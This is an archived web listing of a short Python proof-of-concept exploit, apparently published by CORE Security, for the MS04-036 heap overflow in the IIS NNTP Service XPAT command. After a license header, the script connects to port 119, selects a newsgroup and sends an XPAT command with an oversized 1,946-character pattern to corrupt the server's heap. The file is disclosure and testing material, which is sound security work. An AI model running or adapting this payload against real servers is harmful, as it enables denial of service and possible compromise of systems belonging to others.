home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / nntp / ms04-036poc.py < prev   
Encoding:
Python Source  |  2005-02-12  |  887 b   |  36 lines
  1. #--
  2. # IIS NNTP Service XPAT command heap overflow proof of concept
  3. #
  4. # Author:
  5. #    Lucas Lavarello (lucas at coresecurity dot com)
  6. #    Juliano Rizzo   (juliano at coresecurity dot com)
  7. #
  8. # Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
  9. # All rights reserved.
  10. #
  11. # THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
  12. # WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
  13. # FOR ANY DIRECT,  INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
  14. # CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
  15. # THIS SOFTWARE
  16. #
  17. # www coresecurity com
  18. #--
  19. from socket import * 
  20.  
  21. host = "127.0.0.1"
  22. pat = "C"*1946  + " " + "X"*10
  23.  
  24. newsgroup = "control.newgroup"
  25.  
  26. sock = socket(AF_INET, SOCK_STREAM)
  27. sock.connect((host, 119))
  28.  
  29. print sock.recv(512)
  30.  
  31. sock.send("group %s\x0d\x0a" % newsgroup)
  32.  
  33. print sock.recv(512)
  34.  
  35. sock.send("xpat From 1-9 %s \x0d\x0a" % pat)
  36.